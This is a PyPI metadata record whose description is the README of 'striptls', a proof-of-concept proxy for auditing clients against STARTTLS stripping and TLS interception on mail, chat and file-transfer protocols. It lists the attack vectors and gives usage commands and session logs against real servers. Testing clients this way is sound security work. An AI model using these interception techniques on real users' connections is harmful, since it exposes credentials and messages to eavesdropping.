{
    "info": {
        "author": "tintinweb",
        "author_email": "tintinweb@oststrom.com",
        "bugtrack_url": null,
        "classifiers": [],
        "description": ".. figure:: http://i68.tinypic.com/2iqz7t2.png\n\nstriptls - auditing proxy\n=========================\n\npoc implementation of STARTTLS stripping attacks\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nA generic tcp proxy implementation and audit tool to perform protocol\nindependent ``ssl/tls`` interception and ``STARTTLS`` stripping attacks\non ``SMTP``, ``POP3``, ``IMAP``, ``FTP``, ``NNTP``, ``XMPP``, ``ACAP``\nand ``IRC``.\n\nRequires:\n         \n\n-  Python >= 2.7.9 (``SSLContext``)\n-  (optional for tls interception) Certificate and PrivateKey in PEM\n   format (single file) ``--key=server.pem``\n\nVectors\n^^^^^^^\n\n-  GENERIC\n-  Intercept - protocol independent ssl/tls interception. peeks for TLS\n   Handshake, converts socket to tls (tls-to-tls proxy)\n-  InboundIntercept - protocol independent ssl/tls interception for the\n   inbound channel only (tls-to-plain proxy)\n-  SMTP\n-  SMTP.StripFromCapabilities - server response capability patch\n-  SMTP.StripWithInvalidResponseCode - client STARTTLS stripping,\n   invalid response code\n-  SMTP.UntrustedIntercept - STARTTLS interception (client and server\n   talking ssl) (requires server.pem in pwd)\n-  SMTP.StripWithTemporaryError\n-  SMTP.StripWithError\n-  SMTP.ProtocolDowngradeStripExtendedMode\n-  SMTP.InjectCommand\n-  SMTP.InboundStarttlsProxy - (starttls-to-plain proxy)\n-  POP3\n-  POP3.StripFromCapabilities\n-  POP3.StripWithError\n-  POP3.UntrustedIntercept\n-  IMAP\n-  IMAP.StripFromCapabilities\n-  IMAP.StripWithError\n-  IMAP.UntrustedIntercept\n-  IMAP.ProtocolDowngradeToV2\n-  FTP\n-  FTP.StripFromCapabilities\n-  FTP.StripWithError\n-  FTP.UntrustedIntercept\n-  NNTP\n-  NNTP.StripFromCapabilities\n-  NNTP.StripWithError\n-  NNTP.UntrustedIntercept\n-  XMPP\n-  XMPP.StripFromCapabilities\n-  XMPP.StripInboundTLS\n-  XMPP.UntrustedIntercept\n-  ACAP (untested)\n-  ACAP.StripFromCapabilities\n-  ACAP.StripWithError\n-  ACAP.UntrustedIntercept\n-  IRC\n-  IRC.StripFromCapabilities\n-  IRC.StripWithError\n-  IRC.UntrustedIntercept\n-  IRC.StripWithNotRegistered\n-  IRC.StripCAPWithNotregistered\n-  IRC.StripWithSilentDrop\n\nResults:\n\n::\n\n    - [*] client: 127.0.0.1\n    -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>\n    -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>\n    -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>\n    -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>\n    - [*] client: 192.168.139.1\n    -     [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>\n    -     [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>\n    -     [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>\n\nUsage\n-----\n\n::\n\n    #> python -m striptls --help    # from pip/setup.py\n    #> python striptls --help       # from source / root folder\n    Usage: striptls.py [options]\n\n           example: striptls.py --listen 0.0.0.0:25 --remote mail.server.tld:25\n\n\n    Options:\n      -h, --help            show this help message and exit\n      -q, --quiet           be quiet [default: True]\n      -l LISTEN, --listen=LISTEN\n                            listen ip:port [default: 0.0.0.0:<remote_port>]\n      -r REMOTE, --remote=REMOTE\n                            remote target ip:port to forward sessions to\n      -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM\n                            format assumed [default: server.pem]\n      -s, --generic-ssl-intercept\n                            dynamically intercept SSL/TLS\n      -b BUFFER_SIZE, --bufsiz=BUFFER_SIZE\n      -x VECTORS, --vectors=VECTORS\n                            Comma separated list of vectors. Use 'ALL' (default)\n                            to select all vectors, 'NONE' for tcp/ssl proxy mode.\n                            Available vectors: ACAP.StripFromCapabilities,\n                            ACAP.StripWithError, ACAP.UntrustedIntercept,\n                            FTP.StripFromCapabilities, FTP.StripWithError,\n                            FTP.UntrustedIntercept, GENERIC.Intercept,\n                            IMAP.ProtocolDowngradeToV2,\n                            IMAP.StripFromCapabilities, IMAP.StripWithError,\n                            IMAP.UntrustedIntercept,\n                            IRC.StripCAPWithNotRegistered,\n                            IRC.StripFromCapabilities, IRC.StripWithError,\n                            IRC.StripWithNotRegistered, IRC.StripWithSilentDrop,\n                            IRC.UntrustedIntercept, NNTP.StripFromCapabilities,\n                            NNTP.StripWithError, NNTP.UntrustedIntercept,\n                            POP3.StripFromCapabilities, POP3.StripWithError,\n                            POP3.UntrustedIntercept, SMTP.InboundStarttlsProxy,\n                            SMTP.InjectCommand,\n                            SMTP.ProtocolDowngradeStripExtendedMode,\n                            SMTP.StripFromCapabilities, SMTP.StripWithError,\n                            SMTP.StripWithInvalidResponseCode,\n                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,\n                            XMPP.StripFromCapabilities, XMPP.StripInboundTLS,\n                            XMPP.UntrustedIntercept [default: ALL]\n\nInstall (optional)\n------------------\n\nfrom pip\n\n::\n\n    #> pip install striptls\n\nfrom source\n\n::\n\n    #> setup.py install\n\nExamples\n--------\n\n::\n\n                      inbound                    outbound\n    [inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]\n      smtp-client                   striptls                    remote/target\n\nlocal ``smtp-client`` -> ``localhost:8825`` (proxy) ->\n``mail.gmx.net:25``\n\nGeneric SSL/TLS Interception\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n``--generic-ssl-intercept`` is a global switch to enable generic ssl/tls\nhandshake detection and session conversion. Can be combined with any\nmangle/vector.\n\n``GENERIC.Intercept`` is a mangle/vector implementation of the ssl/tls\nhandshake detect and convert feature.\n\n::\n\n    # python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:465 -x GENERIC.Intercept\n    - INFO     - <Proxy 0x1fdcf50 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 465)> ready.\n    - DEBUG    - * added vector (port:None , proto: GENERIC): <class __main__.Intercept at 0x0218AAB0>\n    - INFO     - <RewriteDispatcher ssl/tls_intercept=False vectors={None: set([<class __main__.Intercept at 0x0218AAB0>])}>\n    - INFO     - <Session 0x1ff00b0> client ('127.0.0.1', 8228) has connected\n    - INFO     - <Session 0x1ff00b0> connecting to target ('mail.gmx.com', 465)\n    - DEBUG    - <RewriteDispatcher  - changed mangle: __main__.Intercept new: True>\n    - INFO     - ProtocolDetect: SSL/TLS version: TLS_1_0\n    - INFO     - SSL Handshake detected - performing ssl/tls conversion\n    - DEBUG    - <Session 0x1ff00b0> [client] <> [      ]          SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n    - DEBUG    - <Session 0x1ff00b0> [      ] <> [server]          SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n    - DEBUG    - <Session 0x1ff00b0> [client] <= [server]          '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <Session 0x1ff00b0> [client] => [server]          'hi\\r\\n'\n    - DEBUG    - <Session 0x1ff00b0> [client] <= [server]          '500 Syntax error, command unrecognized\\r\\n'\n\n    # python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:25 -x NONE --generic-ssl-intercept\n    - INFO     - <Proxy 0x1efbf70 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 25)> ready.\n    - INFO     - <RewriteDispatcher ssl/tls_intercept=True vectors={}>\n    - DEBUG    - <ProtocolDetect 0x1f21b70 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0x1f10110> client ('127.0.0.1', 8290) has connected\n    - INFO     - <Session 0x1f10110> connecting to target ('mail.gmx.com', 25)\n    - DEBUG    - <Session 0x1f10110> [client] <= [server]          '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <Session 0x1f10110> [client] => [server]          'EHLO openssl.client.net\\r\\n'\n    - DEBUG    - <Session 0x1f10110> [client] <= [server]          '250-gmx.com Hello openssl.client.net [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1f10110> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1f10110> [client] <= [server]          '220 OK\\r\\n'\n    - INFO     - ProtocolDetect: SSL/TLS version: TLS_1_0\n    - INFO     - SSL Handshake detected - performing ssl/tls conversion\n    - DEBUG    - <Session 0x1f10110> [client] <> [      ]          SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n    - DEBUG    - <Session 0x1f10110> [      ] <> [server]          SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n    - DEBUG    - <Session 0x1f10110> [client] => [server]          'EHLO A\\r\\n'\n    - DEBUG    - <Session 0x1f10110> [client] <= [server]          '250-gmx.com Hello A [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 69920427\\r\\n250AUTH LOGIN PLAIN\\r\\n'\n\nAudit Mode\n~~~~~~~~~~\n\niterates all protocol specific cases on a per client basis and keeps\ntrack of clients violating the starttls protocol. Ctrl+C to abort audit\nand print results.\n\n::\n\n    #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25\n    - INFO     - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.\n    - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripFromCapabilities at 0xffd4632c>\n    - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.StripWithError at 0xffd4635c>\n    - DEBUG    - * added test (port:21   , proto:     FTP): <class striptls.UntrustedIntercept at 0xffd4638c>\n    - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>\n    - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.StripWithError at 0xffd4629c>\n    - DEBUG    - * added test (port:143  , proto:    IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>\n    - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>\n    - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.StripWithError at 0xffd4641c>\n    - DEBUG    - * added test (port:119  , proto:    NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>\n    - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.StripWithError at 0xffd461dc>\n    - DEBUG    - * added test (port:110  , proto:    POP3): <class striptls.UntrustedIntercept at 0xffd4620c>\n    - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>\n    - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithError at 0xffd4614c>\n    - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>\n    - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>\n    - DEBUG    - * added test (port:25   , proto:    SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>\n    - DEBUG    - * added test (port:5222 , proto:    XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>\n    - INFO     - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>\n    - DEBUG    - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected\n    - INFO     - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithInvalidResponseCode new: True>\n    - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250-STARTTLS\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] => [server][mangled] None\n    - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0xffcf6e4cL> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0xffcf6e4cL> terminated.\n    - DEBUG    - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected\n    - INFO     - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithTemporaryError new: True>\n    - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] => [server][mangled] None\n    - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0xffd0918cL> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0xffd0918cL> terminated.\n    - DEBUG    - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected\n    - INFO     - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>\n    - DEBUG    - <Session 0xffd0926cL> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0xffd0926cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n    - WARNING  - <Session 0xffd0926cL> terminated.\n    - DEBUG    - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected\n    - INFO     - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripWithError new: True>\n    - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] => [server][mangled] None\n    - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0xffd0934cL> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0xffd0934cL> terminated.\n    - WARNING  - Ctrl C - Stopping server\n    - INFO     -  -- audit results --\n    - INFO     - [*] client: 127.0.0.1\n    - INFO     -     [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>\n    - INFO     -     [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>\n    - INFO     -     [           ] <class striptls.StripFromCapabilities at 0xffd316bc>\n    - INFO     -     [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>\n\nStrip STARTTLS from server capabilities\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n::\n\n    #> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities\n    - INFO     - <Proxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.\n    - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripFromCapabilities at 0x01FE77D8>])}>\n    - DEBUG    - <ProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0x1fe6f10> client ('127.0.0.1', 20070) has connected\n    - INFO     - <Session 0x1fe6f10> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0x1fe6f10> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0x1fe6f10> terminated.\n\nInvalid STARTTLS response code\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n::\n\n    #> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode\n    - INFO     - <Proxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.\n    - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.StripWithInvalidResponseCode at 0x02010730>])}>\n    - DEBUG    - <ProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0x1feff10> client ('127.0.0.1', 20061) has connected\n    - INFO     - <Session 0x1feff10> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0x1feff10> [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250-STARTTLS\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] <= [server][mangled] '200 STRIPTLS\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] => [server][mangled] None\n    - DEBUG    - <Session 0x1feff10> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0x1feff10> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0x1feff10> terminated.\n\nUntrusted SSL Intercept (for clients not checking server cert trust)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n::\n\n    #> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept\n    - INFO     - <Proxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.\n    - INFO     - <RewriteDispatcher attacks={25: set([<class __main__.UntrustedIntercept at 0x01F45298>])}>\n    - DEBUG    - <ProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)\n    - INFO     - <Session 0x1f46990> client ('127.0.0.1', 20238) has connected\n    - INFO     - <Session 0x1f46990> connecting to target ('mail.gmx.net', 25)\n    - DEBUG    - <Session 0x1f46990> [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server][mangled] '220 Go ahead\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server][mangled] waiting for inbound SSL Handshake\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'STARTTLS\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] => [server][mangled] performing outbound SSL handshake\n    - DEBUG    - <Session 0x1f46990> [client] => [server][mangled] None\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'ehlo [192.168.139.1]\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 69920427\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'mail FROM:<a@b.com> size=10\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server]          '530 Authentication required\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] => [server]          'rset\\r\\n'\n    - DEBUG    - <Session 0x1f46990> [client] <= [server]          '250 OK\\r\\n'\n    - WARNING  - <Session 0x1f46990> terminated.\n\nXMPP Audit Trail\n~~~~~~~~~~~~~~~~\n\nExample: Pidgin with optional transport security.\n\nXMPP.StripInboundTLS - Inbound Plain - Outbound TLS - in case server requires starttls\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n::\n\n        python striptls --listen 0.0.0.0:5222 --remote jabber.ccc.de:5222 -k ../server.pem\n        - INFO     - <Proxy 0x7f08322ba310 listen=('0.0.0.0', 5222) target=('jabber.ccc.de', 5222)> ready.\n        ...\n        - DEBUG    - <ProtocolDetect 0x7f083196a810 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)\n        ...\n        - INFO     - <Session 0x7f083196a7d0> client ('192.168.139.1', 56888) has connected\n        - INFO     - <Session 0x7f083196a7d0> connecting to target ('jabber.ccc.de', 5222)\n        - DEBUG    - <Session 0x7f083196a7d0> [client] => [server]          \"<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>\"\n        - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripInboundTLS new: True>\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          \"<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13821701589972978594' from='jabber.ccc.de' version='1.0' xml:lang='en'>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          \"<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] => [server][mangled] \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] => [server][mangled] performing outbound SSL handshake\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server][mangled] \"<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] => [server]          \"<iq type='get' id='purple9f914f80'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          \"<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13515446948282835507' from='jabber.ccc.de' xml:lang='en'>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          \"<stream:error><invalid-namespace xmlns='urn:ietf:params:xml:ns:xmpp-streams'></invalid-namespace></stream:error>\"\n        - DEBUG    - <Session 0x7f083196a7d0> [client] <= [server]          '</stream:stream>'\n        - WARNING  - <Session 0x7f083196a7d0> terminated.\n\nXMPP.StripFromCapabilities - strip starttls server annoucement\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n::\n\n        - DEBUG    - <ProtocolDetect 0x7f083196a990 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)\n        - INFO     - <Session 0x7f083196a910> client ('192.168.139.1', 56890) has connected\n        - INFO     - <Session 0x7f083196a910> connecting to target ('jabber.ccc.de', 5222)\n        - DEBUG    - <Session 0x7f083196a910> [client] => [server]          \"<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>\"\n        - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.StripFromCapabilities new: True>\n        - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          \"<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='12381525525258986322' 